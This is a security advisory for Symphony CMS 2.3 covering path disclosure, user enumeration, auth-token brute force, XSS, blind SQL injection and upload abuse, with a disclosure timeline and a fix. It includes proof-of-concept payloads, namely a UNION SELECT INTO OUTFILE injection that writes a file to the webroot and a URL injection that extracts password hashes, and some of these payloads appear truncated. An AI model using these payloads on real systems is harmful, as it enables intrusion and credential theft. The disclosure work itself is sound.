Symphony is an XSLT-powered open source content management system. [ Taken from: http://getsymphony.com/ ]
Symphony-cms version 2.3 is vulnerable to several vulnerabilities ranging in severity from low to high and can result in complete compromise by an unauthenticated attacker.
- Discovered by: Eldar “Wireghoul” Marcussen
- Vendor: Symphony - http://getsymphony.com
- Affected versions: 2.3 (and possibly earlier)
Local patch disclosure
Direct requests to library files will disclose the full local file path if php is configured to display errors due to the reliance on the library path being declared in a constant of global scope outside of the library script.
The retrive password url http://host/path/symphony/login/retrieve-password/ will display a helpful error message if the email address entered does not exist in the database.
Authentication token brute force
Symphony-cms allows a user to login without entering their username and password via a remote auth url that contains a token made up of the first 8 characters of a sha1 hash of the user’s username and hashed password.
If a user has auth_token_active set to yes in the sym_authors table an attacker can login to their account by brute forcing a key of [0-9A-F]^8 length.
The url http://host/path/symphony/login/[token]/ ie: http://host/path/symphony/login/a39880be/ for the user “admin” with password “admin”.
Cross site scripting
Reflected: The email input field supplied to http://host/path/symphony/login/retrieve-password/ is not sufficiently filtered for malicious characters resulting in reflected cross site scripting.PoC: Submit form with email address: ">
Reflected: The email input field supplied to http://host/path/symphony/login/ is not sufficiently filtered for malicious characters resulting in reflected cross site scripting.
Persistent: The “From name” preference setting in Symphony-cms (http://host/path/symphony/system/preferences/) is not sufficiently encoded resulting in persistent cross site scripting.
Blind sql injection
The username field in the authors detail page is not sufficiently filtered when checking is the username already exists in the system. Resulting in blind sql injection.
PoC: Edit an author’s profile, update the username to include a malicious payload, ie: username’ union select “” FROM sym_authors INTO OUTFILE ’/var/www/workspace/haxed.php where the path to your outfile is based on the local path disclosure.
The “page” number supplied when editing blueprints is vulnerable to sql injection.
We can retrieve a users username, hashed password and auth token status with the following PoC: http://host/path/symphony/bluePRINTs/pages/edit/0%29+union+select+1,2,username,password,5,auth_token_active,7,8,9+from+sym_authors+where+id+=+1+--+/
Unrestricted file upload
While this appears to be intended functionality for authorised users, combined with the aforementioned vulnerabilities it becomes trivial to place a backdoor on the system.
Upgrade to version 2.3.1.
Disclosure time line
- 17-Oct-2012 - Public disclosure
- 03-Oct-2012 - Issues patched in upcoming release
- 18-Sep-2012 - Patch checked into git
- 17-Sep-2012 - Vendor response
- 14-Sep-2012 - Vendor notified through email